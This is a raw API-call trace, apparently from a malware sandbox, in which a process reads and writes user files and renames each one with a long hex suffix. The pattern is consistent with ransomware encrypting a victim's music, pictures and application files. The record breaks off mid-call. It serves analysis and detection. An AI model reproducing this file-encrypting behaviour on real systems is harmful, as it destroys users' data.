returned 0x0 [0168.389] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\do_zPXXY6WZzpCYf02s.wav", lpString2=".F98467A0C6DD0BF7DE1556A7FED40D25E106C9CC144BFB3511A0A550B4178D4C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\do_zPXXY6WZzpCYf02s.wav.F98467A0C6DD0BF7DE1556A7FED40D25E106C9CC144BFB3511A0A550B4178D4C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\do_zPXXY6WZzpCYf02s.wav.F98467A0C6DD0BF7DE1556A7FED40D25E106C9CC144BFB3511A0A550B4178D4C" [0168.389] GetProcessHeap () returned 0x270000 [0168.390] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x138) returned 0x7418450 [0168.390] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x702fa6c, FileInformation=0x7418450, Length=0x138, FileInformationClass=0xa) returned 0x0 [0168.391] CloseHandle (hObject=0x5b0) returned 1 [0168.393] GetProcessHeap () returned 0x270000 [0168.394] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0168.394] RtlInterlockedCompareExchange64 () returned 0x0 [0168.394] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0168.398] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x76900b8, ReturnLength=0x702fa7c) returned 0x0 [0168.400] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\SkVxCvpKdtQjOiR8Ir9y.m4a", lpString2=".D7C2D9BE17AC69FF7B13DC1AC8A6B224B4F796E0FA7DDCB83FEF94A06FEB440D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\SkVxCvpKdtQjOiR8Ir9y.m4a.D7C2D9BE17AC69FF7B13DC1AC8A6B224B4F796E0FA7DDCB83FEF94A06FEB440D") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\SkVxCvpKdtQjOiR8Ir9y.m4a.D7C2D9BE17AC69FF7B13DC1AC8A6B224B4F796E0FA7DDCB83FEF94A06FEB440D" [0168.400] GetProcessHeap () returned 0x270000 [0168.400] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x122) returned 0x4332e00 [0168.400] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x702fa6c, FileInformation=0x4332e00, Length=0x122, FileInformationClass=0xa) returned 0x0 [0168.401] CloseHandle (hObject=0x5ac) returned 1 [0168.403] GetProcessHeap () returned 0x270000 [0168.404] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0168.404] RtlInterlockedCompareExchange64 () returned 0x1 [0168.404] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0168.407] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x7608250, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x7608250, ReturnLength=0x702fa7c) returned 0x0 [0168.409] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\tdPwiKvOmFwgvO.wav", lpString2=".8413491B1ECF2217F929DFCAB92C57C7BD93B96BF674A033916BB901C22BEA1A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\tdPwiKvOmFwgvO.wav.8413491B1ECF2217F929DFCAB92C57C7BD93B96BF674A033916BB901C22BEA1A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\tdPwiKvOmFwgvO.wav.8413491B1ECF2217F929DFCAB92C57C7BD93B96BF674A033916BB901C22BEA1A" [0168.409] GetProcessHeap () returned 0x270000 [0168.409] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x116) returned 0x4333f60 [0168.410] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x702fa6c, FileInformation=0x4333f60, Length=0x116, FileInformationClass=0xa) returned 0x0 [0168.413] CloseHandle (hObject=0x5a4) returned 1 [0168.413] GetProcessHeap () returned 0x270000 [0168.415] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76081a0 | out: hHeap=0x270000) returned 1 [0168.423] RtlInterlockedCompareExchange64 () returned 0x1 [0168.423] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0169.317] ReadFile (in: hFile=0x5b8, lpBuffer=0x7779140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7759008 | out: lpBuffer=0x7779140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7759008) returned 1 [0169.317] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0169.319] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x77590b8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x77590b8, ReturnLength=0x702fa7c) returned 0x0 [0169.321] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\Ys-I5cZz8VrpRcO.png", lpString2=".A00C75CE8EAD87A8AD0FF5EE475C7ABF821C70888BEBFB1095C69E21C31FFA5F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\Ys-I5cZz8VrpRcO.png.A00C75CE8EAD87A8AD0FF5EE475C7ABF821C70888BEBFB1095C69E21C31FFA5F") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\Ys-I5cZz8VrpRcO.png.A00C75CE8EAD87A8AD0FF5EE475C7ABF821C70888BEBFB1095C69E21C31FFA5F" [0169.321] GetProcessHeap () returned 0x270000 [0169.321] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11e) returned 0x4334400 [0169.321] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x702fa6c, FileInformation=0x4334400, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0169.322] CloseHandle (hObject=0x5b8) returned 1 [0169.324] GetProcessHeap () returned 0x270000 [0169.325] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759008 | out: hHeap=0x270000) returned 1 [0169.325] RtlInterlockedCompareExchange64 () returned 0x1 [0169.325] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0169.326] WriteFile (in: hFile=0x5a4, lpBuffer=0x75ca140*, nNumberOfBytesToWrite=0x1c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75aa008 | out: lpBuffer=0x75ca140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75aa008) returned 1 [0169.327] RtlInterlockedCompareExchange64 () returned 0x0 [0169.327] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0170.924] ReadFile (in: hFile=0x590, lpBuffer=0x76d9030, nNumberOfBytesToRead=0x5c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x76b8ef8 | out: lpBuffer=0x76d9030*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76b8ef8) returned 1 [0170.942] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0170.946] WriteFile (in: hFile=0x5dc, lpBuffer=0x7701188*, nNumberOfBytesToWrite=0x1800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76e1050 | out: lpBuffer=0x7701188*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76e1050) returned 1 [0170.947] RtlInterlockedCompareExchange64 () returned 0x0 [0170.947] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0171.646] ReadFile (in: hFile=0x5dc, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0171.647] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0171.670] ReadFile (in: hFile=0x604, lpBuffer=0x7701188, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x76e1050 | out: lpBuffer=0x7701188*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76e1050) returned 1 [0171.671] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0171.689] ReadFile (in: hFile=0x594, lpBuffer=0x77292e0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x77091a8 | out: lpBuffer=0x77292e0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x77091a8) returned 1 [0171.689] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0171.692] WriteFile (in: hFile=0x5cc, lpBuffer=0x7909298*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x78e9160 | out: lpBuffer=0x7909298*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x78e9160) returned 1 [0171.833] RtlInterlockedCompareExchange64 () returned 0x3 [0171.833] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0172.034] NtQueryObject (in: Handle=0x5d8, ObjectInformationClass=0x1, ObjectInformation=0x750a500, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x750a500, ReturnLength=0x702fa7c) returned 0x0 [0172.035] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg", lpString2=".89240EEF8F03E26BED2DA02CCEC6B58F2953A6A21B721B40C7EFB9A84F67CD21" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.89240EEF8F03E26BED2DA02CCEC6B58F2953A6A21B721B40C7EFB9A84F67CD21") returned="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.89240EEF8F03E26BED2DA02CCEC6B58F2953A6A21B721B40C7EFB9A84F67CD21" [0172.035] GetProcessHeap () returned 0x270000 [0172.035] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x128) returned 0x4333a30 [0172.035] NtSetInformationFile (FileHandle=0x5d8, IoStatusBlock=0x702fa6c, FileInformation=0x4333a30, Length=0x128, FileInformationClass=0xa) returned 0x0 [0172.131] CloseHandle (hObject=0x5d8) returned 1 [0172.131] GetProcessHeap () returned 0x270000 [0172.133] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x750a450 | out: hHeap=0x270000) returned 1 [0172.136] RtlInterlockedCompareExchange64 () returned 0x4 [0172.136] GetQueuedCompletionStatus (CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff) Thread: id = 108 os_tid = 0xadc [0142.352] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0156.030] ReadFile (in: hFile=0x598, lpBuffer=0x74ba5a8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x749a470 | out: lpBuffer=0x74ba5a8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x749a470) returned 1 [0156.030] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0156.031] WriteFile (in: hFile=0x598, lpBuffer=0x74ba5a8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x749a470 | out: lpBuffer=0x74ba5a8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x749a470) returned 1 [0156.046] RtlInterlockedCompareExchange64 () returned 0x0 [0156.046] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0156.304] ReadFile (in: hFile=0x598, lpBuffer=0x746a2f8, nNumberOfBytesToRead=0x4a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0) returned 1 [0156.305] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0156.315] WriteFile (in: hFile=0x598, lpBuffer=0x746a2f8*, nNumberOfBytesToWrite=0x4a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0) returned 1 [0156.317] RtlInterlockedCompareExchange64 () returned 0x0 [0156.317] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0156.346] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x744a270, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x744a270, ReturnLength=0x422f7cc) returned 0x0 [0156.347] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml", lpString2=".1693D172FBC5F146785C988C6560B0FCD4A0177C5482CCF2E4A143A646090E0B" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml.1693D172FBC5F146785C988C6560B0FCD4A0177C5482CCF2E4A143A646090E0B") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml.1693D172FBC5F146785C988C6560B0FCD4A0177C5482CCF2E4A143A646090E0B" [0156.347] GetProcessHeap () returned 0x270000 [0156.347] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a2) returned 0x42781a0 [0156.347] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x422f7bc, FileInformation=0x42781a0, Length=0x1a2, FileInformationClass=0xa) returned 0x0 [0156.350] CloseHandle (hObject=0x598) returned 1 [0156.354] GetProcessHeap () returned 0x270000 [0156.356] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0156.357] RtlInterlockedCompareExchange64 () returned 0x5 [0156.358] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0160.637] WriteFile (in: hFile=0x594, lpBuffer=0x7552400*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75322c8 | out: lpBuffer=0x7552400*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75322c8) returned 1 [0160.802] RtlInterlockedCompareExchange64 () returned 0x5 [0160.802] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0161.033] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x755a4d0, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x755a4d0, ReturnLength=0x422f7cc) returned 0x0 [0161.034] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncSessions.dll", lpString2=".8E8C4E2C6E7E9549E3160497BA692B1CD5F8427F3A240672CC03EF5B6A596930" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncSessions.dll.8E8C4E2C6E7E9549E3160497BA692B1CD5F8427F3A240672CC03EF5B6A596930") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncSessions.dll.8E8C4E2C6E7E9549E3160497BA692B1CD5F8427F3A240672CC03EF5B6A596930" [0161.035] GetProcessHeap () returned 0x270000 [0161.035] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x16e) returned 0x328130 [0161.035] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x422f7bc, FileInformation=0x328130, Length=0x16e, FileInformationClass=0xa) returned 0x0 [0161.271] CloseHandle (hObject=0x5b8) returned 1 [0161.787] GetProcessHeap () returned 0x270000 [0161.788] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x755a420 | out: hHeap=0x270000) returned 1 [0161.797] RtlInterlockedCompareExchange64 () returned 0x1 [0161.798] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0162.106] ReadFile (in: hFile=0x5b8, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0162.106] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0162.113] WriteFile (in: hFile=0x594, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0162.116] RtlInterlockedCompareExchange64 () returned 0x1 [0162.116] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0162.117] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x7422118, ReturnLength=0x422f7cc) returned 0x0 [0162.118] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ScreenshotLogo.png", lpString2=".C97C57DA62A8281E67D877B46BDF83D8579C4A28987A1758B5CBDD78CDE7D258" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ScreenshotLogo.png.C97C57DA62A8281E67D877B46BDF83D8579C4A28987A1758B5CBDD78CDE7D258") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ScreenshotLogo.png.C97C57DA62A8281E67D877B46BDF83D8579C4A28987A1758B5CBDD78CDE7D258" [0162.118] GetProcessHeap () returned 0x270000 [0162.118] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x16a) returned 0x328598 [0162.118] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x422f7bc, FileInformation=0x328598, Length=0x16a, FileInformationClass=0xa) returned 0x0 [0162.120] CloseHandle (hObject=0x594) returned 1 [0162.270] GetProcessHeap () returned 0x270000 [0162.271] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0162.271] RtlInterlockedCompareExchange64 () returned 0x1 [0162.271] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0162.526] WriteFile (in: hFile=0x5ac, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0162.528] RtlInterlockedCompareExchange64 () returned 0x1 [0162.528] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0162.690] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x7422118, ReturnLength=0x422f7cc) returned 0x0 [0162.691] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\SqmWrapper.dll", lpString2=".C147FF3E374AA32F5B6B7D17F3ACFB681D73BB1E129B02E26C7382DE427F900E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\SqmWrapper.dll.C147FF3E374AA32F5B6B7D17F3ACFB681D73BB1E129B02E26C7382DE427F900E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\SqmWrapper.dll.C147FF3E374AA32F5B6B7D17F3ACFB681D73BB1E129B02E26C7382DE427F900E" [0162.692] GetProcessHeap () returned 0x270000 [0162.692] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x162) returned 0x7420c40 [0162.692] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x422f7bc, FileInformation=0x7420c40, Length=0x162, FileInformationClass=0xa) returned 0x0 [0162.694] CloseHandle (hObject=0x594) returned 1 [0162.727] GetProcessHeap () returned 0x270000 [0162.728] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0162.728] RtlInterlockedCompareExchange64 () returned 0x2 [0162.728] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0162.957] ReadFile (in: hFile=0x594, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0162.958] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0162.961] WriteFile (in: hFile=0x5b8, lpBuffer=0x746a2f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0) returned 1 [0162.972] RtlInterlockedCompareExchange64 () returned 0x2 [0162.972] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0162.975] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x7422118, ReturnLength=0x422f7cc) returned 0x0 [0163.217] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wlmfds.dll", lpString2=".992033272E5C21D188AE359B6BFD03EDB7798611D0DB384441A4EDEABA7ED942" | out: 